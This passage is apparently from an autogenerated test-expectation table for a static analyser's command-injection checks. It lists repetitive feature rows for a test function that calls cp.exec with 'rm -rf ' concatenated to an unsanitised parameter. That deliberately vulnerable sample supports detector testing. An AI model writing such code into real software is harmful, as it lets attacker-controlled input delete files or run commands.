name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:16:10:18 | foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:16:10:18 | foo | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:10:21 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:10:21 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:10:21 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:10:21 | cp | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:10:21 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:10:21 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:10:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:10:21 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:10:21 | this | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:10:21 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | 'arguments' object of anonymous function | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | exceptional return of anonymous function | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | functio ... OT OK\\n} | assignedToPropName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | functio ... OT OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | functio ... OT OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | return of anonymous function | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:22:12:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:32:10:35 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:32:10:35 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:32:10:35 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:32:10:35 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:32:10:35 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:32:10:35 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:32:10:35 | name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:32:10:35 | name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:32:10:35 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:10:32:10:35 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:3 | cp | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:8 | cp.exec | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:26 | cp.exec ... + name) | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:5:11:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:5:11:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:5:11:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:5:11:8 | exec | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:5:11:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:18 | "rm -rf " | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 